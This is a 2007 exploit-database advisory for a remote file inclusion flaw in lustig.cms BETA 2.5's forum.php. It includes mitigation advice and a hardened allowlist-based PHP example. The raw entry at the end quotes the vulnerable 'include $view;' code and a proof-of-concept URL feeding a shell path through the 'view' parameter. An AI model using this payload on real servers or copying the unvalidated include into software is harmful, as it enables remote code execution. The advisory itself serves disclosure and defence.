vendor: lustig.cms
by: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: lustig.cms
Affected Version From: lustig.cms BETA 2.5
Affected Version To: lustig.cms BETA 2.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerabilities

The 'forum.php' file passes the 'view' parameter directly to an include statement without validating it. By supplying a malicious file path in the 'view' parameter, an attacker can make the server include a remote file and execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, the developer should validate and sanitize user input before including files in the code. Additionally, the developer should avoid using user-controlled input for file inclusion.
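
A hardened form of the include in forum.php, as an added example that is not lustig.cms code or part of the original advisory: the 'view' value is used only as a key into a fixed allowlist and never as a path. The view names, the views/ directory and the resolve_view() helper are hypothetical, and PHP 7.1 or later is assumed.

```php
<?php
// Added example: allowlist-based replacement for `include $view;` in forum.php.
// The view names and file paths below are hypothetical; the advisory does not
// list the forum's real templates.
const FORUM_VIEWS = [
    'index'  => 'views/index.php',
    'thread' => 'views/thread.php',
    'post'   => 'views/post.php',
];

/**
 * Map a request-supplied view name to a fixed local file.
 * Returns null for anything outside the allowlist (URLs, paths,
 * traversal sequences, array parameters).
 */
function resolve_view($requested, array $views, string $baseDir): ?string
{
    // ?view[]=x arrives as an array; only plain strings that are allowlist
    // keys are accepted.
    if (!is_string($requested) || !array_key_exists($requested, $views)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $views[$requested]);
    // realpath() returns false for missing files. Also confirm the resolved
    // file still sits under the base directory (guards against symlinks).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from $_GET rather than from a bare $view
// variable, and fall back to a default view when it is absent.
$file = resolve_view($_GET['view'] ?? 'index', FORUM_VIEWS, __DIR__);
if ($file === null) {
    http_response_code(404);
    exit('Unknown view');
}
include $file;
```

Keeping `allow_url_include` set to `Off` in php.ini (its default) additionally blocks URL wrappers in include statements. It does not stop inclusion of local files, so the allowlist is still needed.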

Exploit-DB raw data:

# lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerabilities

# D.Scripts : http://dfn.dl.sourceforge.net/sourceforge/lustig-cms/lustig.cms_beta_2.5_2.zip

# V.Code : Line 12 . 13 . 14

#  if(isset($view))
#  {
#  include $view;

# POC : /forum/forum.php?view=Shell 

# milw0rm.com [2007-09-27]